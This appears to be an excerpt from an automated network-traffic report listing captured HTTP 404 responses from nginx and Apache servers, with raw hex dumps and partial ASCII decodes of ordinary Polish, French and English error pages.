                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 24 Feb 2025 09:27:04 GMTContent-Type: text/htmlContent-Length: 3550Connection: closeETag: "64c9ae7b-dde"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 35 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 79 64 65 76 69 6c 2e 6e 65 74 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 3a 20 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 6f 62 69 65 6b 74 75 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 69 65 20 7a 6e 61 6c 65 7a 69 6f 6e 6f 20 6f 62 69 65 6b 74 75 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 
6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 41 72 69 61 6c 2c 20 56 65 72 64 61 6e 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 37 33 37 33 37 33 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 7d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 2d 63 65 6c 6c 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 20 20 20 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 24 Feb 2025 09:27:24 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 24 Feb 2025 09:27:27 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 24 Feb 2025 09:27:29 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 837Connection: closeDate: Mon, 24 Feb 2025 09:27:32 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 4c 65 20 66 69 63 68 69 65 72 20 72 65 71 75 69 73 20 6e 27 61 20 70 61 73 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 74 72 6f 75 76 26 65 61 63 75 74 65 3b 2e 0a 49 6c 20 70 65 75 74 20 73 27 61 67 69 72 
20 64 27 75 6e 65 20 65 72 72 65 75 72 20 74 65 63 68 6e 69 71 75 65 2e 20 56 65 75 69 6c 6c 65 7a 20 72 26 65 61 63 75 74 65 3b 65 73 73 61 79 65 72 20 75 6c 74 26 65 61 63 75 74 65 3b 72 69 65 75 72 65 6d 65 6e 74 2e 20 53 69 20 76 6f 75 73 20 6e 65 20 70 6f 75 76 65 7a 20 70 61 73 20 61 63 63 26 65 61 63 75 74 65 3b 64 65 72 20 61 75 20 66 69 63 68 69 65 72 20 61 70 72 26 65 67 72 61 76 65 3b 73 20 70 6c 75 73 69 65 75 72 73 20 74 65 6e 74 61 74 69 76 65 73 2c 20 63 65 6c 61 20 73 69 67 6e 69 66 69 65 20 71 75 27 69 6c 20 61 20 26 65 61 63 75 74 65 3b 74 26 65 61 63 75 74 65 3b 20 73 75 70 70 72 69 6d 26 65 61 63 75 74 65 3b 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta c
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:27:38 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:27:40 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:27:43 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 